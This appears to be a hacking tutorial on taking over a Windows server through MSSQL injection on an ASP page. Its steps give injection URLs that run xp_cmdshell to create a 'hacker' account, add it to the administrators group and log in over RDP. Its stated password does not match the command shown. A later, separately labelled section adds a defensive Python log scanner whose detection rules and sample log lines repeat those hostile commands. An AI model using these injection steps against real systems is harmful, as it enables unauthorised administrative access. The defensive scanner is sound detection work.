Rooting/RDP A Windows Box via MSSQL Injection
Step 1.
Introduction: MSSQL injection can be used against products created by the well-known company Microsoft. Check whether the privileges are ‘dbo’, which means Database Owner.
EXAMPLE:
www.target.com/news.asp?id=1
- If it shows something like ‘dbo’, it means this page has weaknesses and you can root it.
EXAMPLE:
www.target.com/news.asp?id=convert(int,(select+user))–
Step 2.
Adding a User Account:
EXAMPLE:
www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net user hacker /add’;–
// Here uname=hacker and passwd=123456; you can change them.
Step 3.
Adding to Admins Group:
EXAMPLE:
www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net localgroup administrators hacker /add’;–
You are done. Now open Run, type mstsc and hit Enter, then enter the IP of the server. The login screen will appear.
Type uname=hacker
passwd=123456
Done!! :)
You are in!
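
From the defender's side, the requests in Steps 1 to 3 leave recognisable traces in the web server's access log. The following is an added example, not part of the original page: a Python scan over constructed IIS-style log lines, where the rule names, the seven-field log layout and the sample IP addresses are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Rule names are hypothetical; the patterns mirror the requests shown on this page.
RULES = {
    "error_based_probe": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "xp_cmdshell_exec": re.compile(r"\bexec(ute)?\b.*\bxp_cmdshell\b", re.I),
    "account_creation": re.compile(r"\bnet\s+user\s+\S+.*/add\b", re.I),
    "admin_group_add": re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+.*/add\b", re.I),
}

# Constructed sample log (assumed fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-10 09:14:02 198.51.100.7 GET /news.asp id=1 200
2024-01-10 09:14:40 203.0.113.9 GET /news.asp id=convert(int,(select+user))-- 500
2024-01-10 09:15:11 203.0.113.9 GET /news.asp id=;exec+master..xp_cmdshell+'net+user+hacker+/add';-- 200
2024-01-10 09:15:30 203.0.113.9 GET /news.asp id=%3Bexec%20master..xp_cmdshell%20%27net%20localgroup%20administrators%20hacker%20/add%27%3B-- 200
""".splitlines()

def normalise(query, rounds=3):
    """URL-decode repeatedly so double-encoded payloads match, then collapse whitespace."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query)

def scan(lines):
    """Return (client_ip, uri_stem, matched_rule_names) for each suspicious request."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip W3C header lines and truncated records
        c_ip, stem, query = fields[2], fields[4], fields[5]
        text = normalise(query)
        matched = sorted(name for name, rx in RULES.items() if rx.search(text))
        if matched:
            hits.append((c_ip, stem, matched))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on `xp_cmdshell_exec` together with either account rule is worth correlating with Windows account-creation and group-membership events on the database host. xp_cmdshell is disabled by default on SQL Server 2005 and later, and a web application login that is not a database owner or sysadmin cannot run the Step 2 and Step 3 commands at all.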